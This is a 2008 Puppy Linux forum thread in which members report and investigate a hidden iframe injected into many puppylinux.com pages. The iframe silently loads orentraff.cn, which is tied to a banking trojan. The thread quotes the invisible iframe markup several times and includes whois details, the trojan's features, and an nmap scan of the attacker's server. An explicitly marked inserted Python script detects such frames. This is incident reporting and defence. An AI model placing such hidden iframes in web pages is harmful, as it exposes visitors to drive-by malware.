Virus warning from www.puppylinux.com/manuals.htm
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

Posted: Thu 28 Feb 2008, 17:06    Post subject: Virus warning from www.puppylinux.com/manuals.htm

Hi,

I just sent a friend to try out Puppy, and he received several virus warnings from http://www.puppylinux.com/manuals.htm

Searching the forums, I noticed that you have had this problem in the past.

Also, just curious, why is this link http://orentraff.cn/in.cgi?7 in that page?
Caneri

Joined: 04 Sep 2007
Posts: 1580
Location: Canada

Posted: Thu 28 Feb 2008, 17:20

Yes something is not good here.

There is a redirect showing to China...please correct this...as it's a problem.

Eric

_________________
Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb

wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

Posted: Thu 28 Feb 2008, 21:15

BUMP!
Somebody really needs to fix this!!!
Code:
<big>http://www.puppy-linux.info/</big></big><iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe></a> <br>
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

Posted: Thu 28 Feb 2008, 23:44    Post subject: More bad news

Hi,

I know I'm new here, but I just found another page with the
<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe>
hidden at this page: http://www.puppylinux.com/cd-puppy.htm

If the people that run this site need some help, please contact me, and maybe I can be of some help and I'll let you know what kind of sites I can work on.

I would HIGHLY recommend that EVERY page be checked!
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

Posted: Thu 28 Feb 2008, 23:57

Gjc
The puppylinux domain belongs to Barry Kauler himself.
BTW: good eye! I was looking for stray address in the other pages myself.
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

Posted: Fri 29 Feb 2008, 00:10    Post subject: Owner of Domain

Don't know if this guy is the victim or the criminal, but here is the whois data for that Chinese site:

Whois orentraff.cn

Domain Name: orentraff.cn

The results below are provided by CNNIC (China Internet Network Information Center - www.cnnic.net.cn) (whois.cnnic.net.cn)

Domain Name: orentraff.cn
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar: 厦门华商盛世网络有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

Posted: Fri 29 Feb 2008, 00:38

I tracked down This Trojan that is plugged into puppylinux by that admin email address and it's nothing to sneeze at.
The Trojan primarily targets bank accounts and depending on the plugins installed, it may be able to perform the following activities:

* Gather sensitive information about the computer and user configuration information.
* Update itself and install new modules.
* Steal sensitive information contained in forms posted over HTTP (see webmail example)
* Steal local certificate files (*.pfx)
* Hijack the browser navigation.

Note: The hijacking browser navigation functionality of the Trojan may be used to steal confidential bank credentials by redirecting users to phishing Web sites when they attempt to login on certain predetermined web banking sites.
http://www.bluetack.co.uk/forums/lofiversion/index.php/t18052.html
ttuuxxx


Joined: 05 May 2007
Posts: 10747
Location: Ontario Canada,Sydney Australia

Posted: Fri 29 Feb 2008, 02:08

I just tried it and on the bottom of the page it was trying to bring up that china website. I think the page should be deleted straight away and maybe the links and remade some place else. Just for security reasons.
ttuuxxx

_________________
http://audio.online-convert.com/ <-- excellent site
http://samples.mplayerhq.hu/A-codecs/ <-- Codec Test Files
http://html5games.com/ <-- excellent HTML5 games Smile

alienjeff


Joined: 08 Jul 2006
Posts: 2291
Location: Winsted, CT - USA

Posted: Fri 29 Feb 2008, 11:52

Code:
<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none">


Found on:
http://www.puppylinux.com/news.htm
http://www.puppylinux.com/forums.htm
http://www.puppylinux.com/flash-puppy.htm
http://www.puppylinux.com/cd-puppy.htm
http://www.puppylinux.com/hard-puppy.htm
http://www.puppylinux.com/faq.htm
http://www.puppylinux.com/links.htm
http://www.puppylinux.com/zippy-puppy.htm
http://www.puppylinux.com/thin-puppy.htm
http://www.puppylinux.com/emulator-puppy.htm
http://www.puppylinux.com/manuals.htm

Ahem!

Makes one wonder what might be buried in the ISOs.

On a more humorous note, here's another gem uncovered whilst scanning Barry's HTML source:

Code:
<meta name="GENERATOR" content="IBM WebSphere Studio Homepage Builder V6.0.0 for Windows">


Guess Bluefish, Amaya, Composer (or e3, Leafpad or Geany, for that matter) and their ilk aren't good enough for some folks.

EDIT/ADDITION: Of more peculiar interest, note that Barry was building some of those pages while running Windows OS. Irony, sweet irony ...

_________________
hangout: ##b0rked on irc.freenode.net
diversion: http://alienjeff.net - visit The Fringe
quote: "The foundation of authority is based upon the consent of the people." - Thomas Hooker


Last edited by alienjeff on Sun 02 Mar 2008, 11:34; edited 1 time in total
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

Posted: Fri 29 Feb 2008, 12:27    Post subject: Stupid Question

This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

Posted: Fri 29 Feb 2008, 12:33

aj
Some of those pages were clean last night. It looks like this one is a prolific breeder.

Gjc
Quote:
person who is responsible for puppylinux.com actually read any of these forum postings,

Sometimes but it seems like he keeps his distance.
alienjeff


Joined: 08 Jul 2006
Posts: 2291
Location: Winsted, CT - USA

Posted: Fri 29 Feb 2008, 12:53    Post subject: Re: Stupid Question

georgejc wrote:
This may be a stupid question...

"There are no stupid questions, but there are a LOT of inquisitive idiots." - Dr`Keovorkian, ChanOp #puppylinux

_________________
hangout: ##b0rked on irc.freenode.net
diversion: http://alienjeff.net - visit The Fringe
quote: "The foundation of authority is based upon the consent of the people." - Thomas Hooker

Lobster
Official Crustacean


Joined: 04 May 2005
Posts: 15117
Location: Paradox Realm

Posted: Fri 29 Feb 2008, 14:46    Post subject: Re: Stupid Question

georgejc wrote:
This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?


I have already sent Barry Kauler a PM (private message) through this forum

Smile

_________________
Puppy WIKI

Last edited by Lobster on Sat 08 Mar 2008, 02:50; edited 1 time in total
prehistoric


Joined: 23 Oct 2007
Posts: 1266

Posted: Fri 29 Feb 2008, 15:28    Post subject: manuals mirror

The manuals are also mirrored at http://puppylover.netsons.org/dokupuppy/. I just did a very quick check for "orentraff" and didn't find that string. That doesn't rule out another redirect which my eyes aren't sharp enough to catch right away.

I doubt Grisha Nizov is Chinese. I've been looking for an interloper who speaks a language more likely to be associated with the name.
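
Added example, not part of the original thread or any poster's code: searching a mirror for one known string misses a redirect to a different host, so this Python check flags any iframe that is both hidden and loaded from another site. The function names, the `puppylinux.com` site-host argument and the `SAMPLE` page (the snippet quoted in this thread plus invented `example.org` / `example.net` frames) are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def is_hidden(attrs):
    """True if the frame is styled or sized so a visitor never sees it."""
    if HIDDEN_STYLE.search(attrs.get("style") or ""):
        return True
    # A width or height of 0 or 1 pixel is the usual invisible-frame sizing.
    sizes = [(attrs.get(k) or "").strip().lower() for k in ("width", "height")]
    return any(s in ("0", "1", "0px", "1px") for s in sizes)

class HiddenFrameFinder(HTMLParser):
    """Collects (line, host) for every hidden iframe that loads another site."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        host = (urlparse(a.get("src") or "").hostname or "").lower()
        same_site = host == self.site_host or host.endswith("." + self.site_host)
        if host and not same_site and is_hidden(a):
            self.findings.append((self.getpos()[0], host))

def scan(html, site_host):
    finder = HiddenFrameFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: line 3 is the snippet quoted in this thread; the
# example.org / example.net frames are invented for contrast.
SAMPLE = """<html><body>
<big>http://www.puppy-linux.info/</big>
<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe>
<iframe src="http://video.example.org/embed/1" width="480" height="360"></iframe>
<iframe src="http://www.puppylinux.com/menu.htm" style="display:none"></iframe>
<IFRAME SRC=http://tracker.example.net/x HEIGHT=1 WIDTH=1></IFRAME>
</body></html>"""

if __name__ == "__main__":
    for line, host in scan(SAMPLE, "puppylinux.com"):
        print(f"line {line}: hidden iframe loads {host}")
```

This only inspects static markup; a frame written into the page by script at load time would need the scripts reviewed as well.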
alienjeff


Joined: 08 Jul 2006
Posts: 2291
Location: Winsted, CT - USA

Posted: Sat 01 Mar 2008, 07:33

http://www.siteadvisor.com/sites/orentraff.cn/summary/
http://www.dnsstuff.com/tools/ipall.ch?domain=%2077.221.133.106
IP address: 77.221.133.106
Reverse DNS: 77.221.133.106.addr.datapoint.ru.
Reverse DNS authenticity: [Could be forged: hostname 77.221.133.106.addr.datapoint.ru. does not exist]
ASN: 0
ASN Name: IANA-RSVD-0
IP range connectivity: 0
Registrar (per ASN): Unknown
Country (per IP registrar): RU [Russian Federation]
Country Currency: RUR [Russia Rubles]
Country IP Range: 77.221.128.0 to 77.221.159.255
Country fraud profile: High
City (per outside source): Unknown
Country (per outside source): RU [Russian Federation]
Private (internal) IP? No
IP address registrar: BOGUS
Known Proxy? No
Link for WHOIS: 77.221.133.106

http://www.globedomain.com/forums/viewtopic.php?f=3&t=2857&start=0&st=0&sk=t&sd=a&view=print

sh-3.00# traceroute 77.221.133.106
traceroute to 77.221.133.106 (77.221.133.106), 30 hops max, 40 byte packets
1 192.168.123.254 (192.168.123.254) 1.256 ms 4.221 ms 1.196 ms
2 10.30.0.1 (10.30.0.1) 7.899 ms 8.047 ms 8.248 ms
3 172.20.97.1 (172.20.97.1) 9.57 ms 19.111 ms 13.811 ms
4 172.20.98.65 (172.20.98.65) 11.093 ms 8.163 ms 8.19 ms
5 172.20.103.34 (172.20.103.34) 10.803 ms 9.344 ms 17.053 ms
6 so-9-1.car2.Boston1.Level3.net (4.79.2.41) 28.061 ms 16.341 ms 13.772 ms
7 ae-5-5.ebr1.NewYork1.Level3.net (4.69.132.250) 22.926 ms 29.744 ms 21.959 ms
8 ae-4.ebr2.London1.Level3.net (4.69.132.110) 104.017 ms 88.724 ms 96.972 ms
9 ae-2.ebr2.Amsterdam1.Level3.net (4.69.132.134) 107.602 ms 104.205 ms 108.036 ms
10 ae-1-100.ebr1.Amsterdam1.Level3.net (4.69.133.85) 109.212 ms 98.03 ms 104.995 ms
11 ae-2.ebr2.Dusseldorf1.Level3.net (4.69.133.90) 106.62 ms 107.116 ms 106.284 ms
12 ae-4-4.car1.Stockholm1.Level3.net (4.69.135.21) 127.446 ms 126.947 ms 129.787 ms
13 rt741-001.stk.retn.net (213.242.110.18) 126.603 ms 134.132 ms 128.836 ms
14 ae0-3.RT008-002.spb.retn.net (81.222.15.45) 139.494 ms 137.416 ms 138.096 ms
15 GW-InfoBox.retn.net (81.222.2.102) 138.268 ms 140.336 ms 145.495 ms
16 77.221.128.58.addr.datapoint.ru (77.221.128.58) 144.319 ms 139.417 ms 137.992 ms
17 * * *

sh-3.00# nmap 77.221.133.106

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2008-03-01 06:31 PUP
Interesting ports on 77.221.133.106.addr.datapoint.ru (77.221.133.106):
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp closed pop3
143/tcp closed imap
443/tcp closed https
465/tcp closed smtps
953/tcp closed rndc
993/tcp closed imaps
995/tcp closed pop3s

Nmap finished: 1 IP address (1 host up) scanned in 31.860 seconds

_________________
hangout: ##b0rked on irc.freenode.net
diversion: http://alienjeff.net - visit The Fringe
quote: "The foundation of authority is based upon the consent of the people." - Thomas Hooker
